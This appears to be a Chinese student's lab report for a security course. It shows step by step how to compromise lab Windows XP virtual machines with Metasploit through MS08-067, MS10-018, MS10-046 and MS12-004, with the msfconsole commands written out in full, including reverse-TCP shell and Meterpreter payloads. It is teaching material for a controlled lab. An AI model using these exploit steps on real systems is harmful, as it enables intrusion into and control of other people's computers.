1、计算机系统安全 实验二metasploit计算机系统安全 实验二:操作系统安全与metasploit渗透测试实验目的: 学习计算机操作系统安全相关内容。 学习操作系统渗透相关内容 学习metasploit渗透工具使用。实验原理:Windows 操作系统安全结构网络渗透原理实验环境:软件: vmware 环境下, 虚拟机, vm-WinXP镜像 虚拟机,backtrack 4及backtrack 5 虚拟机镜像 等。实验拓扑:被渗透机: 使用虚拟机XP,建议使用未安装更新的英文XP操作系统, 设置其IP地址为,自动获得,虚拟机网络连接方式 NAT方式。实验室计算机network系统下中netwo
2、rk_vm 目录中有metasploitable_XP,可使用之。渗透测试机: 使用Bt4或5作为操作系统,准备工作: 启动两台虚拟机,按上图方式设置,请先记录下两台虚拟机的IP: 被渗透机: 操作系统:_windows xp with sp1_ IP地址: 渗透测试机: 操作系统:_bt5_ IP地址:注意,若网络连接未启用,请先启用之,linux 下可使用ifup eth0)实验内容:第一部分:针对操作系统内部服务端口进行渗透了解ms08-067漏洞详情:(请课后上网查询相关内容)漏洞描述:曾经的冲击波、震荡波等大规模攻击都是由于Windows的RPC服务漏洞造成的,MS08-067远程溢
3、出漏洞也不例外。MS08-067远程溢出漏洞的原因是由于Windows系统中RPC存在缺陷造成的,Windows系统的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,如果受影响的系统收到了特制伪造的RPC请求,可能允许远程执行代码,导致完全入侵用户系统,以SYSTEM权限执行任意指令并获取数据,并获取对该系统的控制权,造成系统失窃及系统崩溃等严重问题。漏洞对象:受MS08-067远程溢出漏洞影响的系统非常多,受影响的操作系统有Windows XP /2000/Vista/2003等。除Windows Server 2008 Core
4、外,基本上所有的Windows系统都会遭受此漏洞的攻击,特别是在Windows 2000、Windows XP和Windows Server 2003系统,攻击者可以利用此漏洞无需通过认证运行任意代码。这个漏洞还可能被蠕虫利用,此安全漏洞可以通过恶意构造的网络包直接发起攻击,并且攻击者可以获取完整权限,因此该漏洞很可能会被用于制作蠕虫以进行大规模的攻击。漏洞端口:_445_步骤一:启动metasploit 控制台msfconsole记录其步骤二:搜索模块 ms08-067号模块search ms08-067找到模块,记录其名称,级别,描述步骤三:使用这个模块use windows/smb/ms
5、08_067_netapi步骤四:查找有用的payloadsshow payloads步骤五:使用其中最常用的一个payloadset payload windows/shell/reverse_tcp步骤六:查看当前的这个payload 以及攻击所需要的参数选项show options发现模块所需要选项,有些有默认参数: RPORT ,SMBPIPE 有些没有 RHOST 发现payload所需要参数,有些有默认参数: EXITFUNC ,LPORT 有些没有 : LHOST 渗透的目标设置值 : 0 步骤七:设置参数set RHOST 被渗透主机的IP地址set LHOST 渗透测试主机的
6、IP地址。步骤八:show options 查看当前参数设置是否齐全。步骤九:show targets 查看当前攻击的目标。0 若有,则表示可进行自动选择攻击。其他,则为特定选择特定系统。步骤十:参数齐全,目标选定,渗透载荷准备就绪,然后实施。exploit渗透开始。自动创建一shell (命令提示符)使用ipconfig 及dir等命令确定当前控制的计算机是哪台。 打开放大镜:步骤十一:Exit 然后再exit退出。第二部分:针对操作系统下的浏览器进行渗透 步骤一:浏览器漏洞MS10-018了解ms10-018漏洞详情:(请课后上网查询相关内容)漏洞描述: 在提交数据时Internet Ex
7、plorer处理使用特制编码字符串的内容的方式存在信息泄露漏洞。攻击者可以通过创建特制的网页来利用这个漏洞,如果用户查看了该网页就会导致信息泄露。成功利用这个漏洞的攻击者可以查看本地计算机或其他域或Internet Explorer区中的其他浏览器窗口的内容。漏洞对象: Microsoft _Internet _Explorer SP4漏洞端口: 8080 步骤一:启动metasploit 控制台msfconsole步骤二:搜索模块 ms10-018号模块search ms10-018找到模块,记录其名称,级别,描述步骤三:使用这个模块use windows/browser/ms10_018_
8、ie_behaviors步骤四:查找有用的payloadsshow payloads步骤五:使用其中最常用的一个payloadset payload windows/shell/reverse_tcp步骤六:查看当前的这个payload 以及攻击所需要的参数选项show options发现模块所需要选项,有些有默认参数: SRVHOST,SRVPORT,SSL,SSLVersion 有些没有 : URIPATH 发现payload所需要参数,有些有默认参数: EXITFUNC,LPORT 有些没有 : LHOST 步骤七:设置SRVHOST 和LHOST 都设置为渗透测试机 IPset SRV
9、HOST LHOST 可设置为 0渗透准备exploit 则列出一URL如:using url : 暂时渗透到此(注意其中的qte30235fs为自动产生)在当对方机器 使用时,sessions产生使用sessions 来获知sessionsessions -i 1直接将session 转到shell中创建一shell (命令提示符)使用ipconfig 及dir等命令确定当前控制的计算机是哪台打开写字板:第三部分:针对操作系统下类似快捷方式使用进行渗透步骤一:浏览器漏洞MS10-046了解ms10-046漏洞详情:(请课后上网查询相关内容)漏洞描述:Windows支持使用快捷方式或LNK文件
10、。LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所指定的目标具有相同的效果。Windows没有正确地处理LNK文件,特制的LNK文件可能导致Windows自动执行快捷方式文件所指定的代码。这些代码可能位于USB驱动、本地 或远程文件系统、光驱或其他位置,使用资源管理器查看了LNK文件所在位置就足以触发这个漏洞。默认下Windows启动了自动加载和自动播放功能,因此 在连接可移动设备(如USB闪存)后Windows会自动打开资源管理器。其他显示文件图标的应用也可用作这个漏洞的攻击载体。 漏洞对象:Microsoft Windows XP SP3Microsoft Windows X
11、P SP2Microsoft WindowsVistaSP2Microsoft WindowsVistaSP1Microsoft Windows Server 2008Microsoft Windows Server 2008 SP2Microsoft Windows Server 2008 R2Microsoft Windows Server 2003 SP2Microsoft Windows 7 漏洞端口:_80_步骤一:启动metasploit 控制台msfconsole步骤二:搜索模块 ms10-046号模块search ms10-046找到模块,记录其名称,级别,描述步骤三:使用这个
12、模块use windows/browser/ms10_046_shortcut_icon_dllloader步骤四:查找有用的payloadsshow payloads步骤五:使用其中最常用的一个payloadset payload windows/shell/reverse_tcp步骤六:查看当前的这个payload 以及攻击所需要的参数选项show options发现模块所需要选项,有些有默认参数: SRVPORT ,SRVHOST ,URIPATH 有些没有 UNCHOST 发现payload所需要参数,有些有默认参数: EXITFUNC ,LPORT 有些没有 : LHOST 步骤七:
13、设置SRVHOST 和LHOST 都设置为渗透测试机 IPset SRVHOST LHOST 设置浏览的URLset URIPATH (其中hzs 为你的姓名的首字母)target 可设置为 0渗透准备exploit 报错,说明URIPATH不能改动,需要改回默认值重新exploit则列出一URL如:using url : 暂时渗透到此在当对方机器 使用如:using url : 时,sessions产生使用sessions 来获知sessionsessions -i 1直接将session 转到shell中创建一shell (命令提示符)使用ipconfig 及dir等命令确定当前控制的计算
14、机是哪台打开任务管理器:使用taskmgr命令*第四部分:渗透时使用meterpreter工具。浏览器漏洞MS12-004Windows Media Player是系统的多媒体播放组件。WMP在处理畸形结构的MIDI数据时存在内存破坏漏洞,远程攻击者可能利用此漏洞通过诱使用户访问恶意网页控制用户系统。受影响系统:Microsoft Windows XP ProfessionalMicrosoft Windows XP Home EditionMicrosoft Windows VistaMicrosoft Windows Storage Server 2003Microsoft Windows
15、 Server 2008Microsoft Windows Server 2003 Web EditionMicrosoft Windows Server 2003 Standard EditionMicrosoft Windows Server 2003 Enterprise EditionMicrosoft Windows Server 2003 Datacenter EditionMicrosoft Windows 7启动msfconsolesearch ms12_004搜索不到该模块得到相关结果为windows/browser/ms12_004_midi使用它use windows/b
16、rowser/ms12_004_midi查看 payloadsshow payloadsset payload windows/meterpreter/reverse_tcp查看相关的选项optionsshow options有SRVHOST SRVPORT SSL及SSL version为模块的参数有EXITFUNC和LHOST 及LPORT作为payload的参数。还有target 设置设置SRVHOST 和LHOST 都设置为本地IPset SRVHOST LHOST 可设置为 0set URLPATH 渗透准备exploit 则列出一URL如:using 暂时渗透到此在当对方机器 使用时,sessions产生使用sessions 来获知sessionsessions -i 1直接将session 转到shell中创建至meterpreter 使用命令查看当前的meterpreter 可操作的内容。试使用相关的进程管理工具对被渗透计算机上的进行管理!实验心得:通过实验学习到了如何利用metasploit入侵其他电脑,可以在知道对方ip地址的情况下主动渗透,也可以诱使用户访问恶意网页控制用户系统,由此可见漏洞被不法之徒利用之后会对用户造成巨大的损失,让我意识到学好计算机系统安全这门课的重要性。
copyright@ 2008-2023 冰点文库 网站版权所有
经营许可证编号:鄂ICP备19020893号-2